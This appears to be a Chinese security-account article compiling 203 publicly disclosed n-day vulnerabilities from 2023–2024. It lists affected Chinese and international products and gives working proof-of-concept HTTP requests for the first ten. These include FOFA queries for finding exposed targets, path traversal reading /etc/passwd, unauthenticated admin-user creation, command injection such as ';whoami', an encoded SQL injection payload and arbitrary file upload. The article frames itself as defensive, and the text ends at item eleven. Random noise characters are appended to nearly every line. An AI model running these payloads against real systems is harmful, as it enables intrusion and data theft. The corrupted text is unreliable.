互联网公开漏洞整理202309-202406/ e3 E( q* \( C6 H6 s7 X1 m9 E
道一安全 2024-06-05 07:41 北京1 g9 y% q, g* W( R
以下文章来源于网络安全新视界 ,作者网络安全新视界
; r8 R# E$ k2 f) V) [* ?
( ^; F& ]5 @# D% a! e0 H, m发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
% u- S' o! @6 T5 d; o4 @$ P$ ] o5 E' ~6 v1 ?2 j/ K
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
- A2 i+ _0 y1 a9 k% x
6 c2 p$ O. O% K/ @$ I I安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
- e5 I# f) i5 f1 Q/ T
2 A/ g' g0 _; P4 ]0 t文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
% R6 m5 T! V* Q# ~5 a8 ~
0 U z$ `+ J8 Z7 m6 i ^5 W( Q B" ^5 e合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
6 V' U8 F4 v0 _* d3 P1 p2 [# W$ Y: n
+ B, X! R' B1 h7 I% v4 P# F声明
( R" B A+ E) F+ |1 e! B9 O2 v4 H1 G- j0 z5 C" W; y
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
# Y5 e" y5 l" v6 O& P o- z9 R* n; N& b
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
. d; \) E/ p$ X- _1 M v& Y
# v* H1 w4 t3 W: r9 S$ w2 b/ S7 H
5 e" G" E( ^3 B x2 t5 E" o0 P7 e" J3 Y4 d1 U. b; s
目录
# e2 N& X. g5 _5 k8 S; V9 J- k' P" D1 \ F# W& y+ j- f" y: I2 d
01$ t4 x7 o7 b& o- y3 o0 |4 f( @# N
6 a/ m+ l. r0 B* [4 B$ h( m' q1. StarRocks MPP数据库未授权访问
2 T T, c' S% ^8 N5 F. W( G2. Casdoor系统static任意文件读取" D- g8 s1 r* m* k; `6 [
3. EasyCVR智能边缘网关 userlist 信息泄漏
, x" N' h" ?9 o4. EasyCVR视频管理平台存在任意用户添加
$ D# w/ U h+ I* n/ C# u! X& P5. NUUO NVR 视频存储管理设备远程命令执行
+ `) M7 h( m$ A* `, v6. 深信服 NGAF 任意文件读取
, H. i0 {" u! l# I' ~7. 鸿运主动安全监控云平台任意文件下载
3 y9 x- P6 ]/ C9 Y! L8. 斐讯 Phicomm 路由器RCE
" _9 w" B2 @6 D' g2 v9. 稻壳CMS keyword 未授权SQL注入3 s# p# y# q& P$ L; G$ |, i
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
, p8 N* | q- I! B5 h. t( I11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入8 W' c# m% [4 v9 i: y
12. Jorani < 1.0.2 远程命令执行
& m3 z: q0 B4 ~* d6 d- L7 S# a13. 红帆iOffice ioFileDown任意文件读取* r# N! S$ m# D( W) z% J" h. m
14. 华夏ERP(jshERP)敏感信息泄露
5 N% P6 W( F5 j+ T1 w; n15. 华夏ERP getAllList信息泄露
+ R0 W$ i$ L6 B/ _0 d4 n16. 红帆HFOffice医微云SQL注入2 B" H5 w; a$ U0 O' G) h P
17. 大华 DSS itcBulletin SQL 注入
f. y: W* x9 d v3 O18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
5 Z$ N) [ Y) y' l* s- [# _& \19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
# }! P9 f& ~9 J3 u; Y$ z. h20. 大华ICC智能物联综合管理平台任意文件读取/ L7 x; R ?8 I8 b" R: j! m
21. 大华ICC智能物联综合管理平台random远程代码执行3 {3 @! y& j |1 B
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
6 f7 n# j0 |9 x' h9 f23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
5 k! c5 J% |% v: Y+ `( @/ T- @1 a, j# L24. 用友NC 6.5 accept.jsp任意文件上传
* Q' p4 M9 m# c25. 用友NC registerServlet JNDI 远程代码执行1 U: O3 G3 K( |; \
26. 用友NC linkVoucher SQL注入% {" J, p# N% ~5 \* F0 C
27. 用友 NC showcontent SQL注入
" l% W4 f7 c! \( R28. 用友NC grouptemplet 任意文件上传$ ?7 T$ c& o" G1 \) j& Z, P+ m
29. 用友NC down/bill SQL注入5 O5 X7 Q B% _- k
30. 用友NC importPml SQL注入
' v$ d6 N& d3 K0 y" {3 ]6 w: Y" T31. 用友NC runStateServlet SQL注入
$ b3 s. h4 j+ {4 A C1 T9 e% |8 A' j32. 用友NC complainbilldetail SQL注入
. T6 u( {5 I6 u1 R* _- f33. 用友NC downTax/download SQL注入
6 P, u. `- H( c34. 用友NC warningDetailInfo接口SQL注入
- K6 Y* J% w/ ~, N) L( H7 w35. 用友NC-Cloud importhttpscer任意文件上传7 @6 U; v$ w) M! j
36. 用友NC-Cloud soapFormat XXE2 z$ C) ~' x Z* U) Y7 V
37. 用友NC-Cloud IUpdateService XXE
" d+ I8 M p, m; j; w38. 用友U8 Cloud smartweb2.RPC.d XXE
! ~: C! X6 i2 d! N39. 用友U8 Cloud RegisterServlet SQL注入) u1 O- l/ S% Q5 i, r2 U
40. 用友U8-Cloud XChangeServlet XXE
4 h* m4 A5 j! K2 }' w. X7 y- x% o$ U41. 用友U8 Cloud MeasureQueryByToolAction SQL注入! ]4 W. c# R' h6 d
42. 用友GRP-U8 SmartUpload01 文件上传
1 E Q4 o6 K. q/ c" z. u43. 用友GRP-U8 userInfoWeb SQL注入致RCE3 O" B, J( h V1 ~2 d8 C
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
2 P- Y" g/ d+ A0 t- [6 Z45. 用友GRP-U8 ufgovbank XXE& j) o9 o8 | c2 B2 M
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
3 R/ e5 R) j- P2 z) @, y* ~47. 用友GRP A++Cloud 政府财务云 任意文件读取
9 A* y, r4 Y2 z/ U48. 用友U8 CRM swfupload 任意文件上传% m/ R3 s$ C5 E' C3 q) ~# C( x
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
# Y* G$ Q9 ~, D8 Z: y50. QDocs Smart School 6.4.1 filterRecords SQL注入/ ]! u$ R5 h7 Y: |$ q: y
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入) b4 K+ w: e" {1 ]+ u( ]/ r
52. 泛微E-Office json_common.php sql注入4 D) V3 z$ M" K3 J0 ^" Z
53. 迪普 DPTech VPN Service 任意文件上传8 K/ J H& b2 P9 M) R* G; B
54. 畅捷通T+ getstorewarehousebystore 远程代码执行( i( `, R1 g* X# |# Y$ ^
55. 畅捷通T+ getdecallusers信息泄露+ e* o# L- C2 S
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
# {" k$ N3 H4 X6 z1 c57. 畅捷通T+ keyEdit.aspx SQL注入3 N8 J2 q( Z$ p" u+ M
58. 畅捷通T+ KeyInfoList.aspx sql注入
+ ?2 W: n( i6 p& n, ?/ n& A59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行- m9 T Q) A+ k& m+ o" |$ n
60. 百卓Smart管理平台 importexport.php SQL注入
! a( n5 `1 u/ \0 k- K61. 浙大恩特客户资源管理系统 fileupload 任意文件上传- t" h' A+ b7 t
62. IP-guard WebServer 远程命令执行
4 A/ _ @" n/ R63. IP-guard WebServer任意文件读取2 @; F4 N: s' n+ s. l" s
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
9 k' j5 L9 W$ O# M6 ]% x( k+ S65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过7 p, L6 Z a* A8 F( d
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
; I' N0 L% Z, ^" q) P- P" S7 v67. 万户ezOFFICE wpsservlet任意文件上传( B+ \! s$ g8 H+ J" X! R
68. 万户ezOFFICE wf_printnum.jsp SQL注入9 H5 h* Q! g* E4 N; Y
69. 万户 ezOFFICE contract_gd.jsp SQL注入
3 k( g1 F% b7 C9 R70. 万户ezEIP success 命令执行
& V# c9 j+ k+ C! J, H7 T7 |& [71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
7 i& F2 d; v" ]; A72. 致远OA getAjaxDataServlet XXE, T& c s0 r$ o! u+ r
73. GeoServer wms远程代码执行, y8 D6 d m6 D) i+ a. ?7 g
74. 致远M3-server 6_1sp1 反序列化RCE3 p# ?5 w% A- V" z. I/ {( _7 _
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE4 d5 x' H- L. X* ^: F# T4 K$ `9 _
76. 新开普掌上校园服务管理平台service.action远程命令执行" q# q8 ~% a& U4 g! m
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
$ M3 ~. G3 d0 }, [78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
; S7 ?; J6 d5 j9 `5 u5 \" ^$ c$ }79. BYTEVALUE 百为流控路由器远程命令执行: K4 m2 H- O3 e/ E( D, h
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
- _4 f6 R f0 X, Q3 T, |81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露4 H2 f3 K" h9 G* t, ^0 S' ]
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
1 E' }* g4 ?7 u: Y4 x% |83. JeecgBoot testConnection 远程命令执行3 i7 \. g/ [; Q
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入4 ] L/ `+ M1 L1 N) X
85. SysAid On-premise< 23.3.36远程代码执行( V5 H( o" V- A4 ^, Z/ c
86. 日本tosei自助洗衣机RCE
! _! L+ y# }( A87. 安恒明御安全网关aaa_local_web_preview文件上传5 J0 L/ C2 S; T' y0 a
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
" L$ K; R" G# b( w5 A9 |% Z; `$ P89. 致远互联FE协作办公平台editflow_manager存在sql注入
, d# ]- \. _& D90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行9 M" T+ X% P5 M& a3 q- D
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取6 R8 X. } }# c& ~; m- V6 c
92. 海康威视运行管理中心session命令执行1 ]& Q8 L# e/ F* E9 {; b% J6 `% o
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传5 v: o: c& p0 Y& ?: K
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
5 p8 m% O5 i5 O4 d& M" u& K95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行6 `- y9 \+ E$ Y8 I' h0 B
96. Apache OFBiz 18.12.11 groovy 远程代码执行0 l/ x: D9 ~) D' N
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行! O7 ~- f* F) j* C. a
98. SpiderFlow爬虫平台远程命令执行
' ~6 Y+ L" Q, X( w* {/ \99. Ncast盈可视高清智能录播系统busiFacade RCE/ p; T, d! A; k
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
5 c4 d$ h% I5 u8 D% e101. ivanti policy secure-22.6命令注入
5 K' g! C/ {/ P102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
H$ J m! g/ s7 @+ M5 D b103. Ivanti Pulse Connect Secure VPN XXE; x# y8 ~- w5 S2 f" k0 m- l
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露$ R2 G0 }* Y0 k. S
105. SpringBlade v3.2.0 export-user SQL 注入1 g& m5 i6 @' w5 r- M
106. SpringBlade dict-biz/list SQL 注入
2 r9 d* R Z/ W107. SpringBlade tenant/list SQL 注入3 L! [1 h3 z0 X8 G2 k2 Y/ I
108. D-Tale 3.9.0 SSRF& V) v3 a/ i k, g1 q% g( G
109. Jenkins CLI 任意文件读取2 F( ?/ [/ f' a6 _# w
110. Goanywhere MFT 未授权创建管理员
( M+ _) u+ B3 `7 g111. WordPress Plugin HTML5 Video Player SQL注入4 Y/ K2 ]5 L6 r
112. WordPress Plugin NotificationX SQL 注入: |' X2 @5 \; c% L" {# f2 B- j2 x
113. WordPress Automatic 插件任意文件下载和SSRF. {0 H6 ?- p* d9 ?3 K2 X3 I
114. WordPress MasterStudy LMS插件 SQL注入1 Y1 b( t( r8 D
115. WordPress Bricks Builder <= 1.9.6 RCE
0 c: N; c2 U# B3 n( U116. wordpress js-support-ticket文件上传
2 s1 c7 d1 Q1 q1 D117. WordPress LayerSlider插件SQL注入. g5 ]2 U2 O/ z: g: }/ r
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传" e1 l/ v( m3 n
119. 北京百绰智能S20后台sysmanageajax.php sql注入
) Q& h2 i) b! A& S( j, i. s120. 北京百绰智能S40管理平台导入web.php任意文件上传
+ f) P4 Y$ a0 D$ ]% s5 V8 N5 j121. 北京百绰智能S42管理平台userattestation.php任意文件上传" G. B3 @' ]* P, x, _7 X
122. 北京百绰智能s200管理平台/importexport.php sql注入2 H4 D7 M& m2 B# P8 {
123. Atlassian Confluence 模板注入代码执行6 r' [- U1 Y" k. S) k: A5 i, f
124. 湖南建研工程质量检测系统任意文件上传7 n6 y# e! Z$ S8 a$ @1 B2 E
125. ConnectWise ScreenConnect身份验证绕过, ~# |" h( }3 T* c z& P
126. Aiohttp 路径遍历* O* i! ~: O# N$ h- u. D/ R
127. 广联达Linkworks DataExchange.ashx XXE. J$ o$ C0 v8 G2 ? l" J% y$ `- t
128. Adobe ColdFusion 反序列化( \* I: \2 D/ [: m, \3 N+ W* |
129. Adobe ColdFusion 任意文件读取/ m2 Y& y6 K( H! ?
130. Laykefu客服系统任意文件上传8 C" \2 D P. f: n+ H* q
131. Mini-Tmall <=20231017 SQL注入: V3 d. X# L2 X0 O
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过8 E) y% v* C {5 r6 I
133. H5 云商城 file.php 文件上传
* Q3 S% i/ i' X) M134. 网康NS-ASG应用安全网关index.php sql注入
% ?( {- A2 K7 w c135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入& j) [2 }. U7 H) k1 ?6 Y
136. NextChat cors SSRF
& e+ s+ D! m! F5 a" c137. 福建科立迅通信指挥调度平台down_file.php sql注入! @9 f5 C* G1 b6 s$ O5 F& @2 H
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入5 O K0 S1 b" X3 U9 o& J: Q9 n
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
& k+ _8 \: P" [5 X6 a9 g/ e4 P140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
5 P7 L6 Z* W3 V/ R* H" b" h6 A141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
6 i. G7 j; ~7 ~142. CMSV6车辆监控平台系统中存在弱密码
% s8 W: i( F1 |1 V143. Netis WF2780 v2.1.40144 远程命令执行
7 \" j. I8 a" s: e' x& w4 ]" t144. D-Link nas_sharing.cgi 命令注入$ z5 e. z% Q! F) p6 n5 U
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
0 k' s( ^: W+ \, u% i5 S1 b146. MajorDoMo thumb.php 未授权远程代码执行
$ v! [2 J# E& u% l, P147. RaidenMAILD邮件服务器v.4.9.4-路径遍历, e# L* W# @8 Y7 r5 k
148. CrushFTP 认证绕过模板注入% |7 y/ Q l; A( Q4 e/ I( b1 N( V
149. AJ-Report开源数据大屏存在远程命令执行. g: r+ U4 A6 ]( ^9 k" Y
150. AJ-Report 1.4.0 认证绕过与远程代码执行' v. x" q; M$ g+ Z9 G0 [
151. AJ-Report 1.4.1 pageList sql注入) s& \9 ~3 f4 z4 [
152. Progress Kemp LoadMaster 远程命令执行& [0 ?$ L+ O$ j: t+ G$ i
153. gradio任意文件读取
5 r6 X" v' g# Z154. 天维尔消防救援作战调度平台 SQL注入8 \2 L# |& D0 m; n& l/ n: ?/ U6 Z8 ^
155. 六零导航页 file.php 任意文件上传2 U1 u; a) e3 o/ \" S. h9 H
156. TBK DVR-4104/DVR-4216 操作系统命令注入
: w. r( P+ F5 o1 d) c8 e157. 美特CRM upload.jsp 任意文件上传
9 ]. L- s& U. }/ w+ \158. Mura-CMS-processAsyncObject存在SQL注入, J5 F N* k' i" \
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传. C1 J3 G% \6 F& u# Q0 F
160. Sonatype Nexus Repository 3目录遍历与文件读取/ {9 c0 ?, x7 }2 Q6 k0 c3 Y$ P
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传% V |4 Z. M; I& G
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传) c ?& a6 G4 ]9 ~3 z
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
' b1 R. R! }' J" N$ g5 m" ~164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
9 X: h" o& z7 D- [2 N4 i165. OrangeHRM 3.3.3 SQL 注入
\7 }" X3 Z7 }166. 中成科信票务管理平台SeatMapHandler SQL注入) Q) m4 n1 A; X) v* y
167. 精益价值管理系统 DownLoad.aspx任意文件读取
* p6 s9 Y8 i* _2 H168. 宏景EHR OutputCode 任意文件读取
6 B* C# P* ?/ R/ I: @) N9 N, P169. 宏景EHR downlawbase SQL注入
7 w& {$ S/ i# b V9 ?/ ~' E170. 宏景EHR DisplayExcelCustomReport 任意文件读取- a4 z, o; a5 u
171. 通天星CMSV6车载定位监控平台 SQL注入/ u$ f6 J% c7 k4 d0 C5 c
172. DT-高清车牌识别摄像机任意文件读取
' L- ]8 A# n) |+ u8 R# ^173. Check Point 安全网关任意文件读取
+ O4 Y2 V; ?3 f/ E) o: @174. 金和OA C6 FileDownLoad.aspx 任意文件读取6 {' O4 C" v# B" @& M/ r! |
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入, O- Y4 d# _' d/ h/ P% j
176. 电信网关配置管理系统 rewrite.php 文件上传 b5 e' k$ n3 ^6 ?) N) x
177. H3C路由器敏感信息泄露 N3 k3 \. d+ V% C
178. H3C校园网自助服务系统-flexfileupload-任意文件上传/ F: ^) X# I1 x+ ?
179. 建文工程管理系统存在任意文件读取0 x2 d* Z' J2 ]7 R
180. 帮管客 CRM jiliyu SQL注入. k. ~( m+ L) W7 r u" j) y
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入" h# p: M1 K* v# q% z
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
3 h" J7 R; C5 s9 k6 q7 {$ C183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入# f1 x( V6 x3 }8 K$ q
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
8 ]+ b4 B# _$ i; O185. 瑞友天翼应用虚拟化系统SQL注入( w8 Z: G Q* B {" q5 ~0 q6 n
186. F-logic DataCube3 SQL注入9 ~3 M3 b" ]+ t7 L
187. Mura CMS processAsyncObject SQL注入1 z; q! z- n9 c; ]; A1 S
188. 叁体-佳会视频会议 attachment 任意文件读取3 m, H" T$ z6 M" u
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
4 M9 h, G* K( s! ~190. 短视频矩阵营销系统 poihuoqu 任意文件读取, o3 l6 C- g% Y
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
0 d R; I; U, }192. 富通天下外贸ERP UploadEmailAttr 任意文件上传- m; o& N7 Z, L& x* Y* \" f) i2 G
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行0 a5 s0 T6 Q2 q2 V0 I, X4 \& T
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
3 X0 n0 W1 _: j195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
$ c6 m4 ^2 S- l! m$ Y196. 河南省风速科技统一认证平台密码重置
, g# e. O4 _, {3 B" @197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
! Q. i* q, v. l4 M& ?" r5 [198. 阿里云盘 WebDAV 命令注入
8 {" ~. s2 T+ s+ @1 b+ `$ b199. cockpit系统assetsmanager_upload接口 文件上传! M1 g# E1 l1 i' y. k
200. SeaCMS海洋影视管理系统dmku SQL注入 U+ G4 I6 S9 @; u( V
201. 方正全媒体新闻采编系统 binary SQL注入, [$ O: L5 X5 R
202. 微擎系统 AccountEdit任意文件上传
0 l- u2 @$ [: \1 `0 R) \+ v2 q203. 红海云EHR PtFjk 文件上传7 S# ]5 q3 u/ @6 k- D0 y/ `* }
! m. G4 g' _+ w' H& Q5 ]POC列表
% m. ]' V/ U6 L
/ K/ H+ m0 j7 y/ y+ d$ F02
# _) C5 p& `7 k: t9 E
) m: g8 Q) q+ T9 C8 w/ k0 x1. StarRocks MPP数据库未授权访问
2 a3 q7 X$ Q1 g) H% \) DFOFA :title="StarRocks"$ S5 ^2 I. n1 V0 r' N- ]3 q, A( @
GET /mem_tracker HTTP/1.1
' W; V$ o( t) v8 l4 O8 LHost: URL: j. q. \ }/ [9 b
3 x- g9 x( q; z. }. t0 a+ a, i" D+ `+ k- q% Q+ C N
2. Casdoor系统static任意文件读取
1 F) X; }% E. F1 xFOFA :title="Casdoor"
$ \ O6 H! b( n# M: AGET /static/../../../../../../../../../../../etc/passwd HTTP/1.13 }0 d5 z' t% k5 R: E
Host: xx.xx.xx.xx:99993 B; I7 d, J3 y$ }2 w" d& i# c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# i. n, L/ J- T% | I3 s+ P. {9 }
Connection: close! w4 J$ ?% U$ h* F' |
Accept: */*
; `/ S( a' @! vAccept-Language: en
6 w# }9 B! \$ y" DAccept-Encoding: gzip
$ T4 P0 |( o- p2 ]$ F8 x$ D% I" {9 h7 L( i9 A& x
2 t% ~$ V$ h( Q, K9 x3 p8 }) Z7 q4 e
3. EasyCVR智能边缘网关 userlist 信息泄漏0 z9 n# q9 K1 ^4 k" \4 {* V
FOFA :title="EasyCVR"4 w" ~; p; K- v$ t
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
8 h1 J) T/ N% K5 S* g# O7 vHost: xx.xx.xx.xx2 |' M3 X. p" `2 A$ U
5 `, X( W1 i$ Z
, k! [1 u" t" o- N2 G2 l. C
4. EasyCVR视频管理平台存在任意用户添加
1 g% b; R+ F1 k m* e2 s. BFOFA :title="EasyCVR" W: S% z1 h- ?
2 f; o8 ]# ^. u$ Zpassword更改为自己的密码md5' j0 `: L+ _9 o5 Z# K
POST /api/v1/adduser HTTP/1.1: L8 |4 I- @( p9 z/ I
Host: your-ip
$ X, u+ `& e9 q3 wContent-Type: application/x-www-form-urlencoded; charset=UTF-8
6 n- h% t9 g0 Y# H" X$ `
# o" [. {) U' k# f1 i9 Gname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1. @# z% |, Z6 e4 E. a
* O- y" G; V7 A# p
! a, i- Q4 a+ N0 |5 F" V. y3 u8 `. }5. NUUO NVR 视频存储管理设备远程命令执行$ e2 s& W. ~$ S
FOFA:title="Network Video Recorder Login"
% X) X9 e) k, kGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1' A/ O; t( A& ^4 ^5 {/ [5 {4 a. F- k
Host: xx.xx.xx.xx( t; `/ V6 f9 T/ P. g2 e
f3 i- i' {2 x! ]( V( }7 F
, U" |6 Q# G4 \8 i; p2 Z9 S6. 深信服 NGAF 任意文件读取, M5 U7 e$ {: d, I! h
FOFA:title="SANGFOR | NGAF", W& D& @8 D N) U
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
+ d* Z& A! Z% q2 tHost:
. u2 i# z8 E3 Q' F
8 a# ]) ~5 R# V0 _3 J
5 X, m$ H; O) W7 h8 D+ u0 L: g* x7. 鸿运主动安全监控云平台任意文件下载* J5 ?( U5 g$ I+ E
FOFA:body="./open/webApi.html"
* N0 T6 B- o! D9 m; P: [GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1" |: j! w/ j1 E! ~& ^$ C) e
Host:, {2 ^7 t5 z& U- F# s4 }+ d* K
6 i( z8 _6 t4 G- x# G4 P
! L) M( ?% }3 x8 F4 V- l1 X+ m% P2 s! v8. 斐讯 Phicomm 路由器RCE! K1 Q& \9 |+ s: N6 _6 q0 O
FOFA:icon_hash="-1344736688", B1 u7 N4 O( ]$ ]- {" P$ t8 w3 ^
默认账号admin登录后台后,执行操作8 ~5 G5 o5 w& i( s" b/ p
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
. A. t3 K8 Y8 J& XHost: x.x.x.x/ g5 C$ }# m6 |! z8 ]5 @$ E
Cookie: sysauth=第一步登录获取的cookie# G8 M( q% G6 b! l, U6 ]8 P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
2 Q6 Y0 P( X* R$ M: N, GUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
4 V% R# m- F" M4 a8 ^
5 D/ x0 A3 W/ u! U9 }------WebKitFormBoundaryxbgjoytz- ?% R4 O) I7 X' R" d0 w( `
Content-Disposition: form-data; name="wifiRebootEnablestatus"8 g/ B) e+ q: i
8 Q) ^, I0 w, ~) `
%s+ H4 [5 Y4 I Y" }
------WebKitFormBoundaryxbgjoytz# R1 U: K7 o6 s# z; B T
Content-Disposition: form-data; name="wifiRebootrange"
' S6 s3 G: G) H) Z3 i) x& o- ^9 i8 e7 {
12:00; id;
7 Q& t' g4 \6 w$ n+ q------WebKitFormBoundaryxbgjoytz! U! c7 K+ e# ]3 S: H6 e
Content-Disposition: form-data; name="wifiRebootendrange"0 O; s8 m$ x S& l
( W2 y+ |# S$ a. z% z3 L
%s:$ P5 p B5 ?, O; T7 S
------WebKitFormBoundaryxbgjoytz
1 u$ H5 a: v9 H- Q* aContent-Disposition: form-data; name="cururl2" W4 e& ?9 m0 W, ~4 F
. Y) Y8 Q# D" G- ]- W
1 H( N, u. s& |$ N3 S------WebKitFormBoundaryxbgjoytz--1 d% T6 r! ~0 t4 e. V0 k1 Y1 x E3 \
# { A- J+ n) Q o3 V5 X3 N
/ G* G7 E3 M+ T3 h
9. 稻壳CMS keyword 未授权SQL注入6 t9 ~( f. T2 G1 |$ p4 ^9 e
FOFA:app="Doccms"1 a) u- e# ~+ }% ?. A, T
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1) { z$ f, o- S: z0 a
Host: x.x.x.x- D# I: P9 b7 \/ T; s |1 f
' D3 h( K/ C! @& e6 `4 j3 s
6 d1 q- F- Q$ y4 Tpayload为下列语句的二次Url编码; c; Z8 F+ X- s# P! N$ ]
+ J% V* T. e5 W- C% b3 b( D& g: A' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
) C* o, Z% v# F, b& v" i: s k2 G
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传+ M! P1 z y4 N* |7 y. o, L$ G
FOFA:icon_hash="953405444"! \6 i9 x7 c- K2 ^- v) j# w b
* i' Y, }4 j- h: n0 C1 e5 j
文件上传后响应中包含上传文件的路径
9 |( M% ?' ]6 e% `5 |: z4 PPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
) ^0 j( Q8 `- X' I& bHost: x.x.x.x:xx0 v* {: U8 D9 X: Z3 i# G3 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
1 `1 a! i# C2 s7 ?7 Y2 BContent-Length: 197& s1 A7 Y' r* T3 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
( r( p5 C* u. N3 d% ZAccept-Encoding: gzip, deflate6 |3 c/ i6 A' t A0 h0 F
Accept-Language: zh-CN,zh;q=0.96 S$ _1 M! _: o. H; N+ ]6 {3 t) Z
Connection: close
6 l; t8 J. X6 R+ IContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
% S& ~$ Y( e, W/ t( V, D7 f% e$ F( c: k) o; y/ \
------WebKitFormBoundaryxdgaqmqu$ ]1 Y" I" t8 T5 b' q/ z7 e
Content-Disposition: form-data; name="file"filename="icfitnya.txt", ~6 W( Y% }0 C; r
Content-Type: text/html$ F. H$ B) H* |" Y. W' |' R f
/ O& e. A# {; v( h. ~& C
jmnqjfdsupxgfidopeixbgsxbf
/ O: v1 D/ Y6 f( K------WebKitFormBoundaryxdgaqmqu--
! _8 x7 N6 ^- i! ~, N, l a7 u5 i6 A6 N0 ]
, _9 N9 F- _4 Y' V! p/ X! M5 R" R11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入 D& L( \! y- S3 c
